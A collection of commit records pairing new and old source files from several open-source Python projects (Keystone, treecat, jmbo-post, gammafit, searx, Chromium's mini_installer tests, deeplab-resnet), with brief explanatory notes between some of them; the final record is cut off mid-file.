order_of_files_to_handle = ['apt_get_requirements.txt', 'npm_requirements.txt', 'pip_requirements.txt']
for fname in order_of_files_to_handle:
if os.path.isfile(fname):
# assume fname endswith _requirements.txt
l = len('_requirements.txt')
fname_first_part = fname[:-l]
functions_to_handle_requirements[fname_first_part](fname) | apache-2.0 | Python |
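The bug fixed above is a parameter shadowed by a global: each helper declared a parameter named what but read fname, and only worked because the calling loop happened to leave a module-level fname behind. A distilled illustration:
# Distilled version of the bug: the parameter is ignored and the function
# silently reads whichever global fname the caller's loop left behind.
def broken_install(what):
    with open(fname) as f:      # NameError unless a global fname exists
        print(f.read())
def fixed_install(fname):       # the fix: name the parameter it actually uses
    with open(fname) as f:
        print(f.read())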
19c0e8d856049677bc7de2bc293a87a0aac306f8 | Fix wsgi config file access for HTTPD | ging/keystone,cloudbau/keystone,cloudbau/keystone,JioCloud/keystone,townbull/keystone-dtrust,roopali8/keystone,maestro-hybrid-cloud/keystone,townbull/keystone-dtrust,rickerc/keystone_audit,rickerc/keystone_audit,jumpstarter-io/keystone,cloudbau/keystone,jamielennox/keystone,cbrucks/Federated_Keystone,jumpstarter-io/keystone,takeshineshiro/keystone,himanshu-setia/keystone,derekchiang/keystone,maestro-hybrid-cloud/keystone,reeshupatel/demo,idjaw/keystone,derekchiang/keystone,cernops/keystone,dstanek/keystone,citrix-openstack-build/keystone,rickerc/keystone_audit,dsiddharth/access-keys,himanshu-setia/keystone,kwss/keystone,takeshineshiro/keystone,dstanek/keystone,openstack/keystone,blueboxgroup/keystone,jumpstarter-io/keystone,JioCloud/keystone,dstanek/keystone,vivekdhayaal/keystone,reeshupatel/demo,MaheshIBM/keystone,jamielennox/keystone,mahak/keystone,rushiagr/keystone,rodrigods/keystone,ajayaa/keystone,rushiagr/keystone,idjaw/keystone,blueboxgroup/keystone,promptworks/keystone,ntt-sic/keystone,reeshupatel/demo,kwss/keystone,nuxeh/keystone,dims/keystone,nuxeh/keystone,citrix-openstack-build/keystone,rajalokan/keystone,mahak/keystone,ilay09/keystone,klmitch/keystone,ntt-sic/keystone,ilay09/keystone,dims/keystone,rajalokan/keystone,ging/keystone,dsiddharth/access-keys,dsiddharth/access-keys,vivekdhayaal/keystone,ntt-sic/keystone,cbrucks/Federated_Keystone,rajalokan/keystone,rushiagr/keystone,mahak/keystone,promptworks/keystone,rodrigods/keystone,citrix-openstack-build/keystone,promptworks/keystone,ilay09/keystone,ajayaa/keystone,jonnary/keystone,kwss/keystone,MaheshIBM/keystone,nuxeh/keystone,vivekdhayaal/keystone,klmitch/keystone,openstack/keystone,openstack/keystone,townbull/keystone-dtrust,cbrucks/Federated_Keystone,derekchiang/keystone,UTSA-ICS/keystone-kerberos,roopali8/keystone,jonnary/keystone,cernops/keystone,UTSA-ICS/keystone-kerberos | httpd/keystone.py | httpd/keystone.py | import os
from paste import deploy
from keystone import config
from keystone.common import logging
LOG = logging.getLogger(__name__)
CONF = config.CONF
config_files = ['/etc/keystone/keystone.conf']
CONF(project='keystone', default_config_files=config_files)
conf = CONF.config_file[0]
name = os.path.basename(__file__)
if CONF.debug:
CONF.log_opt_values(logging.getLogger(CONF.prog), logging.DEBUG)
options = deploy.appconfig('config:%s' % CONF.config_file[0])
application = deploy.loadapp('config:%s' % conf, name=name)
| import os
from paste import deploy
from keystone import config
from keystone.common import logging
LOG = logging.getLogger(__name__)
CONF = config.CONF
config_files = ['/etc/keystone.conf']
CONF(config_files=config_files)
conf = CONF.config_file[0]
name = os.path.basename(__file__)
if CONF.debug:
CONF.log_opt_values(logging.getLogger(CONF.prog), logging.DEBUG)
options = deploy.appconfig('config:%s' % CONF.config_file[0])
application = deploy.loadapp('config:%s' % conf, name=name)
| apache-2.0 | Python |
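Passing project='keystone' makes oslo.config search the standard per-project locations when the listed defaults are absent. A sketch of the call with the modern oslo_config package name (the snapshot above reaches the same machinery through keystone's own config module):
# Hedged sketch of the oslo.config invocation pattern; args=[] keeps the
# library from consuming sys.argv in this example.
from oslo_config import cfg
CONF = cfg.CONF
CONF(args=[], project='keystone',
     default_config_files=['/etc/keystone/keystone.conf'])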
8eea594e684053a7fbfe1f2f946343cf809be058 | Rename server tests | posterior/treecat,posterior/treecat | treecat/serving_test.py | treecat/serving_test.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
import pytest
from treecat.serving import TreeCatServer
from treecat.testutil import TINY_CONFIG
from treecat.testutil import TINY_DATA
from treecat.testutil import TINY_MASK
from treecat.training import train_model
@pytest.fixture(scope='module')
def model():
return train_model(TINY_DATA, TINY_MASK, TINY_CONFIG)
def test_server_init(model):
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
server._get_session(7)
def test_server_sample_shape(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
samples = server.sample(TINY_DATA, mask)
assert samples.shape == TINY_DATA.shape
assert samples.dtype == TINY_DATA.dtype
assert np.allclose(samples[:, mask], TINY_DATA[:, mask])
def test_server_logprob_shape(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
logprob = server.logprob(TINY_DATA, mask)
assert logprob.shape == (N, )
assert np.isfinite(logprob).all()
assert (logprob < 0.0).all() # Assuming features are discrete.
@pytest.mark.xfail
def test_server_logprob_is_normalized(model):
N, V = TINY_DATA.shape
C = TINY_CONFIG['num_categories']
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# The total probability of all possible rows should be 1.
factors = [range(C)] * V
data = np.array(list(itertools.product(*factors)), dtype=np.int32)
mask = np.array([True] * V, dtype=np.bool_)
logprob = server.logprob(data, mask)
total = np.exp(np.logaddexp.reduce(logprob))
assert abs(total - 1.0) < 1e-6, total
| from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import numpy as np
import pytest
from treecat.serving import TreeCatServer
from treecat.testutil import TINY_CONFIG
from treecat.testutil import TINY_DATA
from treecat.testutil import TINY_MASK
from treecat.training import train_model
@pytest.fixture(scope='module')
def model():
return train_model(TINY_DATA, TINY_MASK, TINY_CONFIG)
def test_server_init(model):
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
server._get_session(7)
def test_server_sample(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
samples = server.sample(TINY_DATA, mask)
assert samples.shape == TINY_DATA.shape
assert samples.dtype == TINY_DATA.dtype
assert np.allclose(samples[:, mask], TINY_DATA[:, mask])
def test_server_logprob(model):
N, V = TINY_DATA.shape
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
# Sample all possible mask patterns.
factors = [[True, False]] * V
for mask in itertools.product(*factors):
mask = np.array(mask, dtype=np.bool_)
logprob = server.logprob(TINY_DATA, mask)
assert logprob.shape == (N, )
assert np.isfinite(logprob).all()
assert (logprob < 0.0).all() # Assuming features are discrete.
@pytest.mark.xfail
def test_server_logprob_total(model):
N, V = TINY_DATA.shape
C = TINY_CONFIG['num_categories']
server = TreeCatServer(model['tree'], model['suffstats'], TINY_CONFIG)
factors = [range(C)] * V
data = np.array(list(itertools.product(*factors)), dtype=np.int32)
mask = np.array([True] * V, dtype=np.bool_)
logprob = server.logprob(data, mask)
total = np.exp(np.logaddexp.reduce(logprob))
assert abs(total - 1.0) < 1e-6, total
| apache-2.0 | Python |
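The normalization test accumulates in log space because exponentiating many tiny per-row log probabilities first would underflow. A tiny self-contained illustration of the same trick:
# logaddexp.reduce sums probabilities without ever leaving log space.
import numpy as np
logprob = np.log(np.full(1000, 1e-3))   # 1000 outcomes, each p = 1e-3
total = np.exp(np.logaddexp.reduce(logprob))
assert abs(total - 1.0) < 1e-9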
671ca30892e3ebeb0a9140f95690853b4b92dc02 | Fix reverse since we deprecated post_object_list | praekelt/jmbo-post,praekelt/jmbo-post | post/views.py | post/views.py | from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from post.models import Post
from jmbo.generic.views import GenericObjectDetail, GenericObjectList
from jmbo.view_modifiers import DefaultViewModifier
class ObjectList(GenericObjectList):
def get_extra_context(self, *args, **kwargs):
return {'title': _('Posts')}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(request, *args, **kwargs)
def get_paginate_by(self, *args, **kwargs):
return 12
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
object_list = ObjectList()
class ObjectDetail(GenericObjectDetail):
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
def get_extra_context(self, *args, **kwargs):
return {'title': 'Posts'}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(
request,
base_url=reverse("object_list", args=['post', 'post']),
ignore_defaults=True,
*args,
**kwargs
)
object_detail = ObjectDetail()
| from django.core.urlresolvers import reverse
from django.utils.translation import ugettext as _
from post.models import Post
from jmbo.generic.views import GenericObjectDetail, GenericObjectList
from jmbo.view_modifiers import DefaultViewModifier
class ObjectList(GenericObjectList):
def get_extra_context(self, *args, **kwargs):
return {'title': _('Posts')}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(request, *args, **kwargs)
def get_paginate_by(self, *args, **kwargs):
return 12
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
object_list = ObjectList()
class ObjectDetail(GenericObjectDetail):
def get_queryset(self, *args, **kwargs):
return Post.permitted.all()
def get_extra_context(self, *args, **kwargs):
return {'title': 'Posts'}
def get_view_modifier(self, request, *args, **kwargs):
return DefaultViewModifier(
request,
base_url=reverse("post_object_list"),
ignore_defaults=True,
*args,
**kwargs
)
object_detail = ObjectDetail()
| bsd-3-clause | Python |
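The fix swaps a reverse() call on a deleted named URL for the generic name plus positional arguments. A sketch of the two styles; it assumes a configured URLconf, so it is illustrative rather than standalone:
# Old and new reverse() styles side by side; names mirror the change above.
from django.core.urlresolvers import reverse  # moved to django.urls in 2.0
url_old = reverse('post_object_list')                    # dedicated URL name
url_new = reverse('object_list', args=['post', 'post'])  # generic name + args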
a03c61430abac8cac5e522a3bf391175cd261cec | fix tests | zblz/naima,cdeil/naima,cdeil/naima | gammafit/tests/test_onezone.py | gammafit/tests/test_onezone.py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
import numpy as np
from numpy.testing import assert_approx_equal
electronozmpars={
'seedspec':'CMB',
'index':2.0,
'cutoff':1e13,
'beta':1.0,
'ngamd':100,
'gmin':1e4,
'gmax':1e10,
}
def test_electronozm():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,0.016769058688230903)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,214080823.28721327)
#def test_electronozm_evolve():
#from ..onezone import ElectronOZM
#ozm = ElectronOZM( np.logspace(0,15,1000), 1, evolve_nelec=True, **electronozmpars)
#ozm.calc_outspec()
#lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
#assert_approx_equal(lsy,5718447729.5694494)
#lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
#assert_approx_equal(lic,1.0514223815442389e+20)
def test_protonozm():
from ..onezone import ProtonOZM
ozm = ProtonOZM( np.logspace(8,15,100), 1, index=2.0,cutoff=1e13,beta=1.0)
ozm.calc_outspec()
lpp=np.trapz(ozm.specpp*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lpp,3.2800253974151616e-4, significant=5)
| # Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
import numpy as np
from numpy.testing import assert_approx_equal
electronozmpars={
'seedspec':'CMB',
'index':2.0,
'cutoff':1e13,
'beta':1.0,
'ngamd':100,
'gmin':1e4,
'gmax':1e10,
}
def test_electronozm():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,0.016769058688230903)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,214080823.28721327)
def test_electronozm_evolve():
from ..onezone import ElectronOZM
ozm = ElectronOZM( np.logspace(0,15,1000), 1, evolve_nelec=True, **electronozmpars)
ozm.calc_outspec()
lsy=np.trapz(ozm.specsy*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lsy,5718447729.5694494)
lic=np.trapz(ozm.specic*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lic,1.0514223815442389e+20)
def test_protonozm():
from ..onezone import ProtonOZM
ozm = ProtonOZM( np.logspace(8,15,100), 1, index=2.0,cutoff=1e13,beta=1.0)
ozm.calc_outspec()
lpp=np.trapz(ozm.specpp*ozm.outspecene**2*u.eV.to('erg'),ozm.outspecene)
assert_approx_equal(lpp,3.2800627079738687e+23, significant=5)
| bsd-3-clause | Python |
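Both assertions integrate a sampled spectrum with np.trapz, which applies the trapezoidal rule over the grid it is given. A tiny numeric check of the helper:
import numpy as np
x = np.linspace(0.0, 1.0, 1001)
print(np.trapz(x**2, x))  # ~0.333333, the exact integral of x^2 on [0, 1]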
74e4e5e507d908950d4458dff5ba4aa5c712866f | Allow localization of "Self Informations" | dalf/searx,dalf/searx,dalf/searx,asciimoo/searx,asciimoo/searx,dalf/searx,asciimoo/searx,asciimoo/searx | searx/plugins/self_info.py | searx/plugins/self_info.py | '''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <[email protected]>
'''
from flask_babel import gettext
import re
name = gettext('Self Informations')
description = gettext('Displays your IP if the query is "ip" and your user agent if the query contains "user agent".')
default_on = True
# Self User Agent regex
p = re.compile(b'.*user[ -]agent.*', re.IGNORECASE)
# attach callback to the post search hook
# request: flask request object
# ctx: the whole local context of the pre search hook
def post_search(request, search):
if search.search_query.pageno > 1:
return True
if search.search_query.query == b'ip':
x_forwarded_for = request.headers.getlist("X-Forwarded-For")
if x_forwarded_for:
ip = x_forwarded_for[0]
else:
ip = request.remote_addr
search.result_container.answers['ip'] = {'answer': ip}
elif p.match(search.search_query.query):
ua = request.user_agent
search.result_container.answers['user-agent'] = {'answer': ua}
return True
| '''
searx is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
searx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with searx. If not, see < http://www.gnu.org/licenses/ >.
(C) 2015 by Adam Tauber, <[email protected]>
'''
from flask_babel import gettext
import re
name = "Self Informations"
description = gettext('Displays your IP if the query is "ip" and your user agent if the query contains "user agent".')
default_on = True
# Self User Agent regex
p = re.compile(b'.*user[ -]agent.*', re.IGNORECASE)
# attach callback to the post search hook
# request: flask request object
# ctx: the whole local context of the pre search hook
def post_search(request, search):
if search.search_query.pageno > 1:
return True
if search.search_query.query == b'ip':
x_forwarded_for = request.headers.getlist("X-Forwarded-For")
if x_forwarded_for:
ip = x_forwarded_for[0]
else:
ip = request.remote_addr
search.result_container.answers['ip'] = {'answer': ip}
elif p.match(search.search_query.query):
ua = request.user_agent
search.result_container.answers['user-agent'] = {'answer': ua}
return True
| agpl-3.0 | Python |
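Wrapping the literal in gettext() both translates it at call time and marks it for pybabel's string extraction. For module-level constants evaluated at import, flask_babel also offers lazy_gettext, which defers the lookup; a brief sketch:
# gettext() translates immediately; lazy_gettext() returns a lazy proxy
# that is resolved only when the string is actually rendered.
from flask_babel import gettext, lazy_gettext
name = gettext('Self Informations')
deferred_name = lazy_gettext('Self Informations')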
d04ded85e01c4a9e0960d57a37ecd83fc92fa5cd | Add a fallback to mini_installer_tests' quit_chrome.py exit logic. | jaruba/chromium.src,Jonekee/chromium.src,fujunwei/chromium-crosswalk,dednal/chromium.src,fujunwei/chromium-crosswalk,chuan9/chromium-crosswalk,ondra-novak/chromium.src,mohamed--abdel-maksoud/chromium.src,mohamed--abdel-maksoud/chromium.src,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,fujunwei/chromium-crosswalk,bright-sparks/chromium-spacewalk,PeterWangIntel/chromium-crosswalk,krieger-od/nwjs_chromium.src,bright-sparks/chromium-spacewalk,hgl888/chromium-crosswalk,Just-D/chromium-1,markYoungH/chromium.src,Pluto-tv/chromium-crosswalk,M4sse/chromium.src,dednal/chromium.src,hgl888/chromium-crosswalk-efl,ltilve/chromium,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,patrickm/chromium.src,patrickm/chromium.src,chuan9/chromium-crosswalk,Jonekee/chromium.src,Fireblend/chromium-crosswalk,markYoungH/chromium.src,hgl888/chromium-crosswalk-efl,Fireblend/chromium-crosswalk,dednal/chromium.src,dednal/chromium.src,dednal/chromium.src,markYoungH/chromium.src,jaruba/chromium.src,bright-sparks/chromium-spacewalk,M4sse/chromium.src,axinging/chromium-crosswalk,Just-D/chromium-1,dushu1203/chromium.src,bright-sparks/chromium-spacewalk,axinging/chromium-crosswalk,ltilve/chromium,anirudhSK/chromium,ondra-novak/chromium.src,dednal/chromium.src,M4sse/chromium.src,littlstar/chromium.src,Fireblend/chromium-crosswalk,dednal/chromium.src,TheTypoMaster/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,dednal/chromium.src,bright-sparks/chromium-spacewalk,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk-efl,axinging/chromium-crosswalk,ondra-novak/chromium.src,M4sse/chromium.src,Jonekee/chromium.src,chuan9/chromium-crosswalk,bright-sparks/chromium-spacewalk,krieger-od/nwjs_chromium.src,crosswalk-project/chromium-crosswalk-efl,Jonekee/chromium.src,axinging/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,krieger-od/nwjs_chromium.src,ltilve/chromium,M4sse/chromium.src,hgl888/chromium-crosswalk-efl,ondra-novak/chromium.src,Chilledheart/chromium,crosswalk-project/chromium-crosswalk-efl,dushu1203/chromium.src,hgl888/chromium-crosswalk-efl,jaruba/chromium.src,hgl888/chromium-crosswalk,anirudhSK/chromium,axinging/chromium-crosswalk,littlstar/chromium.src,Pluto-tv/chromium-crosswalk,Chilledheart/chromium,krieger-od/nwjs_chromium.src,patrickm/chromium.src,dushu1203/chromium.src,Pluto-tv/chromium-crosswalk,jaruba/chromium.src,PeterWangIntel/chromium-crosswalk,dushu1203/chromium.src,axinging/chromium-crosswalk,fujunwei/chromium-crosswalk,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk,littlstar/chromium.src,Just-D/chromium-1,krieger-od/nwjs_chromium.src,anirudhSK/chromium,jaruba/chromium.src,dushu1203/chromium.src,krieger-od/nwjs_chromium.src,Chilledheart/chromium,dushu1203/chromium.src,PeterWangIntel/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,M4sse/chromium.src,markYoungH/chromium.src,Jonekee/chromium.src,fujunwei/chromium-crosswalk,chuan9/chromium-crosswalk,littlstar/chromium.src,axinging/chromium-crosswalk,M4sse/chromium.src,anirudhSK/chromium,anirudhSK/chromium,PeterWangIntel/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,axinging/chromium-crosswalk,Chilledheart/chromium,TheTypoMaster/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,Jonekee/chromium.src,TheTypoMaster/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,dednal/chromium.src,Fireblend/chromium-crosswalk,krieger-od/nwjs_chromium.src,M4sse/chromium.src,M4sse/ch
romium.src,fujunwei/chromium-crosswalk,patrickm/chromium.src,crosswalk-project/chromium-crosswalk-efl,Just-D/chromium-1,krieger-od/nwjs_chromium.src,krieger-od/nwjs_chromium.src,bright-sparks/chromium-spacewalk,hgl888/chromium-crosswalk,ondra-novak/chromium.src,crosswalk-project/chromium-crosswalk-efl,ltilve/chromium,Fireblend/chromium-crosswalk,patrickm/chromium.src,anirudhSK/chromium,Jonekee/chromium.src,anirudhSK/chromium,mohamed--abdel-maksoud/chromium.src,bright-sparks/chromium-spacewalk,Just-D/chromium-1,dushu1203/chromium.src,Jonekee/chromium.src,dednal/chromium.src,ondra-novak/chromium.src,krieger-od/nwjs_chromium.src,jaruba/chromium.src,Just-D/chromium-1,ondra-novak/chromium.src,Chilledheart/chromium,mohamed--abdel-maksoud/chromium.src,ondra-novak/chromium.src,fujunwei/chromium-crosswalk,jaruba/chromium.src,markYoungH/chromium.src,littlstar/chromium.src,ltilve/chromium,littlstar/chromium.src,markYoungH/chromium.src,axinging/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,ltilve/chromium,dushu1203/chromium.src,dednal/chromium.src,littlstar/chromium.src,ltilve/chromium,axinging/chromium-crosswalk,Pluto-tv/chromium-crosswalk,Fireblend/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,hgl888/chromium-crosswalk-efl,M4sse/chromium.src,Chilledheart/chromium,hgl888/chromium-crosswalk-efl,markYoungH/chromium.src,hgl888/chromium-crosswalk-efl,Chilledheart/chromium,jaruba/chromium.src,Jonekee/chromium.src,chuan9/chromium-crosswalk,PeterWangIntel/chromium-crosswalk,littlstar/chromium.src,mohamed--abdel-maksoud/chromium.src,dushu1203/chromium.src,Jonekee/chromium.src,ondra-novak/chromium.src,Fireblend/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,anirudhSK/chromium,patrickm/chromium.src,jaruba/chromium.src,hgl888/chromium-crosswalk,crosswalk-project/chromium-crosswalk-efl,Fireblend/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,anirudhSK/chromium,Chilledheart/chromium,markYoungH/chromium.src,hgl888/chromium-crosswalk,hgl888/chromium-crosswalk,Just-D/chromium-1,ltilve/chromium,axinging/chromium-crosswalk,chuan9/chromium-crosswalk,patrickm/chromium.src,hgl888/chromium-crosswalk,jaruba/chromium.src,chuan9/chromium-crosswalk,anirudhSK/chromium,mohamed--abdel-maksoud/chromium.src,krieger-od/nwjs_chromium.src,markYoungH/chromium.src,Pluto-tv/chromium-crosswalk,markYoungH/chromium.src,bright-sparks/chromium-spacewalk,Jonekee/chromium.src,dushu1203/chromium.src,patrickm/chromium.src,crosswalk-project/chromium-crosswalk-efl,hgl888/chromium-crosswalk-efl,chuan9/chromium-crosswalk,dushu1203/chromium.src,ltilve/chromium,crosswalk-project/chromium-crosswalk-efl,TheTypoMaster/chromium-crosswalk,anirudhSK/chromium,jaruba/chromium.src,mohamed--abdel-maksoud/chromium.src,mohamed--abdel-maksoud/chromium.src,fujunwei/chromium-crosswalk,M4sse/chromium.src,Just-D/chromium-1,Pluto-tv/chromium-crosswalk,anirudhSK/chromium,hgl888/chromium-crosswalk,TheTypoMaster/chromium-crosswalk,mohamed--abdel-maksoud/chromium.src,Pluto-tv/chromium-crosswalk,hgl888/chromium-crosswalk-efl,Just-D/chromium-1,patrickm/chromium.src,chuan9/chromium-crosswalk,fujunwei/chromium-crosswalk | chrome/test/mini_installer/quit_chrome.py | chrome/test/mini_installer/quit_chrome.py | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Quits Chrome.
This script sends a WM_CLOSE message to each window of Chrome and waits until
the process terminates.
"""
import optparse
import os
import pywintypes
import sys
import time
import win32con
import win32gui
import winerror
import chrome_helper
def CloseWindows(process_path):
"""Closes all windows owned by processes whose exe path is |process_path|.
Args:
process_path: The path to the executable whose processes will have their
windows closed.
Returns:
A boolean indicating whether the processes successfully terminated within
25 seconds.
"""
start_time = time.time()
while time.time() - start_time < 25:
process_ids = chrome_helper.GetProcessIDs(process_path)
if not process_ids:
return True
for hwnd in chrome_helper.GetWindowHandles(process_ids):
try:
win32gui.PostMessage(hwnd, win32con.WM_CLOSE, 0, 0)
except pywintypes.error as error:
# It's normal that some window handles have become invalid.
if error.args[0] != winerror.ERROR_INVALID_WINDOW_HANDLE:
raise
time.sleep(0.1)
return False
def KillNamedProcess(process_path):
""" Kills all running exes with the same name as the exe at |process_path|.
Args:
process_path: The path to an executable.
Returns:
True if running executables were successfully killed. False otherwise.
"""
return os.system('taskkill /f /im %s' % os.path.basename(process_path)) == 0
def main():
usage = 'usage: %prog chrome_path'
parser = optparse.OptionParser(usage, description='Quit Chrome.')
_, args = parser.parse_args()
if len(args) != 1:
parser.error('Incorrect number of arguments.')
chrome_path = args[0]
if not CloseWindows(chrome_path):
# TODO(robertshield): Investigate why Chrome occasionally doesn't shut down.
print 'Warning: Chrome not responding to window closure. Killing process...'
    KillNamedProcess(chrome_path)
return 0
if __name__ == '__main__':
sys.exit(main())
| # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Quits Chrome.
This script sends a WM_CLOSE message to each window of Chrome and waits until
the process terminates.
"""
import optparse
import pywintypes
import sys
import time
import win32con
import win32gui
import winerror
import chrome_helper
def CloseWindows(process_path):
"""Closes all windows owned by processes whose path is |process_path|.
Args:
process_path: The path to the process.
Returns:
A boolean indicating whether the processes successfully terminate within
30 seconds.
"""
start_time = time.time()
while time.time() - start_time < 30:
process_ids = chrome_helper.GetProcessIDs(process_path)
if not process_ids:
return True
for hwnd in chrome_helper.GetWindowHandles(process_ids):
try:
win32gui.PostMessage(hwnd, win32con.WM_CLOSE, 0, 0)
except pywintypes.error as error:
# It's normal that some window handles have become invalid.
if error.args[0] != winerror.ERROR_INVALID_WINDOW_HANDLE:
raise
time.sleep(0.1)
return False
def main():
usage = 'usage: %prog chrome_path'
parser = optparse.OptionParser(usage, description='Quit Chrome.')
_, args = parser.parse_args()
if len(args) != 1:
parser.error('Incorrect number of arguments.')
chrome_path = args[0]
if not CloseWindows(chrome_path):
raise Exception('Could not quit Chrome.')
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python |
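The commit's shape, ask politely and wait, then force, is a general shutdown pattern. A Python 3 sketch of the same fallback using subprocess in place of Win32 window messages; the child command is an illustrative POSIX example:
import subprocess
proc = subprocess.Popen(['sleep', '60'])
proc.terminate()              # polite request (SIGTERM on POSIX)
try:
    proc.wait(timeout=25)     # give it time to exit cleanly
except subprocess.TimeoutExpired:
    proc.kill()               # fallback: force it down
    proc.wait()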
2d55d95c623bef4848131878061887854ff8a971 | Update utils.py | ALISCIFP/tensorflow-resnet-segmentation,nasatony/deeplab_resnet,DrSleep/tensorflow-deeplab-resnet,ALISCIFP/tensorflow-resnet-segmentation | deeplab_resnet/utils.py | deeplab_resnet/utils.py | from PIL import Image
import numpy as np
import tensorflow as tf
n_classes = 21
# colour map
label_colours = [(0,0,0)
# 0=background
,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# 6=bus, 7=car, 8=cat, 9=chair, 10=cow
,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
,(0,64,0),(128,64,0),(0,192,0),(128,192,0),(0,64,128)]
# 16=potted plant, 17=sheep, 18=sofa, 19=train, 20=tv/monitor
def decode_labels(mask):
"""Decode batch of segmentation masks.
Args:
label_batch: result of inference after taking argmax.
Returns:
An batch of RGB images of the same size
"""
img = Image.new('RGB', (len(mask[0]), len(mask)))
pixels = img.load()
for j_, j in enumerate(mask):
for k_, k in enumerate(j):
if k < n_classes:
pixels[k_,j_] = label_colours[k]
return np.array(img)
def prepare_label(input_batch, new_size):
"""Resize masks and perform one-hot encoding.
Args:
input_batch: input tensor of shape [batch_size H W 1].
new_size: a tensor with new height and width.
Returns:
Outputs a tensor of shape [batch_size h w 21]
with last dimension comprised of 0's and 1's only.
"""
with tf.name_scope('label_encode'):
input_batch = tf.image.resize_nearest_neighbor(input_batch, new_size) # as labels are integer numbers, need to use NN interp.
input_batch = tf.squeeze(input_batch, squeeze_dims=[3]) # reducing the channel dimension.
input_batch = tf.one_hot(input_batch, depth=n_classes)
return input_batch
| from PIL import Image
import numpy as np
# colour map
label_colours = [(0,0,0)
# 0=background
,(128,0,0),(0,128,0),(128,128,0),(0,0,128),(128,0,128)
# 1=aeroplane, 2=bicycle, 3=bird, 4=boat, 5=bottle
,(0,128,128),(128,128,128),(64,0,0),(192,0,0),(64,128,0)
# 6=bus, 7=car, 8=cat, 9=chair, 10=cow
,(192,128,0),(64,0,128),(192,0,128),(64,128,128),(192,128,128)
# 11=diningtable, 12=dog, 13=horse, 14=motorbike, 15=person
